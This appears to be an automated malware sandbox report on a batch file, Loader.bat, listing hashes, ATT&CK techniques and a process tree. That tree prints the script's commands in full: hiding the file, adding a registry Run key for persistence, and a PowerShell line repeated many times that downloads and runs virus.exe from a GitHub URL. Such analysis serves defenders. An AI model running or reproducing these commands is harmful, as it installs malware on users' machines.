34e0e93a5bf239bc92b9fb15c93930d5d9dafb09d4986b8dddc180c56d0ddfb8

Analysis

max time kernel
149s
max time network
118s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
10-12-2024 23:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.bat
Size

5KB
MD5

036ac78d84f772e72aff4fbc7b4173bc
SHA1

84e1145e5165e31ee8c8db00134fad7236ca66bc
SHA256

34e0e93a5bf239bc92b9fb15c93930d5d9dafb09d4986b8dddc180c56d0ddfb8
SHA512

c33205e7dda5630d7ebb42b72ad20a29eb0b7b7a2e0c47c75310087e7236a4434dd52c48a68bd3a76a258bc0d7008162679b1c28716d46c6210ad282986be099
SSDEEP

96:OTawvGrSZG7aZgXWp/Yejj7T+a8FMiXpFLv4Ltf:UaYQSZ5ZgKYejjnj9

Score

10^/10

execution persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 30 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2836	powershell.exe
1688	powershell.exe
1676	powershell.exe
1984	powershell.exe
2680	powershell.exe
2640	powershell.exe
2260	powershell.exe
2336	powershell.exe
896	powershell.exe
2192	powershell.exe
2568	powershell.exe
784	powershell.exe
804	powershell.exe
1308	powershell.exe
924	powershell.exe
1008	powershell.exe
1524	powershell.exe
2564	powershell.exe
1728	powershell.exe
1532	powershell.exe
1616	powershell.exe
2700	powershell.exe
1652	powershell.exe
2732	powershell.exe
916	powershell.exe
2088	powershell.exe
3000	powershell.exe
1440	powershell.exe
2824	powershell.exe
2700	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Loader.bat"	reg.exe

Delays execution with timeout.exe 30 IoCs

evasion

pid	Process
2788	timeout.exe
2952	timeout.exe
3024	timeout.exe
1844	timeout.exe
1680	timeout.exe
3056	timeout.exe
1224	timeout.exe
1064	timeout.exe
1436	timeout.exe
1468	timeout.exe
2632	timeout.exe
1908	timeout.exe
536	timeout.exe
2712	timeout.exe
2864	timeout.exe
2696	timeout.exe
2992	timeout.exe
2128	timeout.exe
580	timeout.exe
1936	timeout.exe
1920	timeout.exe
844	timeout.exe
2688	timeout.exe
2672	timeout.exe
2860	timeout.exe
1764	timeout.exe
2240	timeout.exe
2024	timeout.exe
1260	timeout.exe
2320	timeout.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
804	powershell.exe
2732	powershell.exe
2564	powershell.exe
2700	powershell.exe
2192	powershell.exe
1688	powershell.exe
1676	powershell.exe
1728	powershell.exe
2568	powershell.exe
924	powershell.exe
1308	powershell.exe
1652	powershell.exe
1984	powershell.exe
1532	powershell.exe
784	powershell.exe
3000	powershell.exe
2680	powershell.exe
2824	powershell.exe
2640	powershell.exe
2700	powershell.exe
2260	powershell.exe
1008	powershell.exe
1616	powershell.exe
2836	powershell.exe
1440	powershell.exe
1524	powershell.exe
2336	powershell.exe
916	powershell.exe
2088	powershell.exe
896	powershell.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

description	pid	Process
Token: SeDebugPrivilege	804	powershell.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	924	powershell.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	784	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	916	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	896	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2072 wrote to memory of 280	2072	cmd.exe	31
PID 2072 wrote to memory of 280	2072	cmd.exe	31
PID 2072 wrote to memory of 280	2072	cmd.exe	31
PID 2072 wrote to memory of 2488	2072	cmd.exe	32
PID 2072 wrote to memory of 2488	2072	cmd.exe	32
PID 2072 wrote to memory of 2488	2072	cmd.exe	32
PID 2072 wrote to memory of 804	2072	cmd.exe	33
PID 2072 wrote to memory of 804	2072	cmd.exe	33
PID 2072 wrote to memory of 804	2072	cmd.exe	33
PID 2072 wrote to memory of 580	2072	cmd.exe	34
PID 2072 wrote to memory of 580	2072	cmd.exe	34
PID 2072 wrote to memory of 580	2072	cmd.exe	34
PID 2072 wrote to memory of 2732	2072	cmd.exe	36
PID 2072 wrote to memory of 2732	2072	cmd.exe	36
PID 2072 wrote to memory of 2732	2072	cmd.exe	36
PID 2072 wrote to memory of 3056	2072	cmd.exe	37
PID 2072 wrote to memory of 3056	2072	cmd.exe	37
PID 2072 wrote to memory of 3056	2072	cmd.exe	37
PID 2072 wrote to memory of 2564	2072	cmd.exe	38
PID 2072 wrote to memory of 2564	2072	cmd.exe	38
PID 2072 wrote to memory of 2564	2072	cmd.exe	38
PID 2072 wrote to memory of 2788	2072	cmd.exe	39
PID 2072 wrote to memory of 2788	2072	cmd.exe	39
PID 2072 wrote to memory of 2788	2072	cmd.exe	39
PID 2072 wrote to memory of 2700	2072	cmd.exe	40
PID 2072 wrote to memory of 2700	2072	cmd.exe	40
PID 2072 wrote to memory of 2700	2072	cmd.exe	40
PID 2072 wrote to memory of 3024	2072	cmd.exe	41
PID 2072 wrote to memory of 3024	2072	cmd.exe	41
PID 2072 wrote to memory of 3024	2072	cmd.exe	41
PID 2072 wrote to memory of 2192	2072	cmd.exe	42
PID 2072 wrote to memory of 2192	2072	cmd.exe	42
PID 2072 wrote to memory of 2192	2072	cmd.exe	42
PID 2072 wrote to memory of 1224	2072	cmd.exe	43
PID 2072 wrote to memory of 1224	2072	cmd.exe	43
PID 2072 wrote to memory of 1224	2072	cmd.exe	43
PID 2072 wrote to memory of 1688	2072	cmd.exe	44
PID 2072 wrote to memory of 1688	2072	cmd.exe	44
PID 2072 wrote to memory of 1688	2072	cmd.exe	44
PID 2072 wrote to memory of 1936	2072	cmd.exe	45
PID 2072 wrote to memory of 1936	2072	cmd.exe	45
PID 2072 wrote to memory of 1936	2072	cmd.exe	45
PID 2072 wrote to memory of 1676	2072	cmd.exe	46
PID 2072 wrote to memory of 1676	2072	cmd.exe	46
PID 2072 wrote to memory of 1676	2072	cmd.exe	46
PID 2072 wrote to memory of 1764	2072	cmd.exe	47
PID 2072 wrote to memory of 1764	2072	cmd.exe	47
PID 2072 wrote to memory of 1764	2072	cmd.exe	47
PID 2072 wrote to memory of 1728	2072	cmd.exe	48
PID 2072 wrote to memory of 1728	2072	cmd.exe	48
PID 2072 wrote to memory of 1728	2072	cmd.exe	48
PID 2072 wrote to memory of 2712	2072	cmd.exe	49
PID 2072 wrote to memory of 2712	2072	cmd.exe	49
PID 2072 wrote to memory of 2712	2072	cmd.exe	49
PID 2072 wrote to memory of 2568	2072	cmd.exe	50
PID 2072 wrote to memory of 2568	2072	cmd.exe	50
PID 2072 wrote to memory of 2568	2072	cmd.exe	50
PID 2072 wrote to memory of 1064	2072	cmd.exe	51
PID 2072 wrote to memory of 1064	2072	cmd.exe	51
PID 2072 wrote to memory of 1064	2072	cmd.exe	51
PID 2072 wrote to memory of 924	2072	cmd.exe	52
PID 2072 wrote to memory of 924	2072	cmd.exe	52
PID 2072 wrote to memory of 924	2072	cmd.exe	52
PID 2072 wrote to memory of 1920	2072	cmd.exe	53

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
280	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Windows\system32\attrib.exe
  attrib +h +r C:\Users\Admin\AppData\Local\Temp\Loader.bat
  2⤵
  - Views/modifies file attributes
  PID:280
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Startup" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Loader.bat" /f
  2⤵
  - Adds Run key to start application
  PID:2488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:804
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2732
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:3056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2564
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2700
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:3024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2192
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1688
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1676
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1728
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2568
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:924
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1308
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1652
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1984
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1532
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:784
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3000
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2680
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2824
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2640
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2700
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2260
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1008
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1616
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1440
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1524
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2336
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:916
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2088
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:896
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6a0f1ca0c33b388e5e45073e80decea2

SHA1
7036502bd979afceea13f081ef71c8ff450b8423

SHA256
eba29b3692b650fab5f779f4809eb4c7b15dcb493bc33e3ba898f7de7e3b3e31

SHA512
6e2e5a4fc4ce3a98ee9c4159301e4bc1b15dbc5339f8573ab45d3363f79e6b45cfd8dfbd74d40c67c3be9cbd846ed18957d8e87429b41d2525c26b9292c751e7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9cb54617ce1e97c2567a29781a5fe091

SHA1
eb7e89ca44032c3c507e0c5d37531958a1bf15e2

SHA256
9edc00c952ed55b62686bafd49e7d3d6a9cb1e2ef22e110ecd341c3ab01a422a

SHA512
ca401cccf030269322fbe6167f7a6c89e32c933f849b8991ffaf3de86b80f517fbc1de457ae1c7887307385242ac7102eb9c7e9af2d513be6610a3787f556e5e

Download Submit
memory/804-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/804-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/804-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/804-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/804-11-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/804-12-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/804-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

Filesize
4KB

Download
memory/804-7-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/804-5-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2732-18-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2732-19-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

Filesize
32KB

Download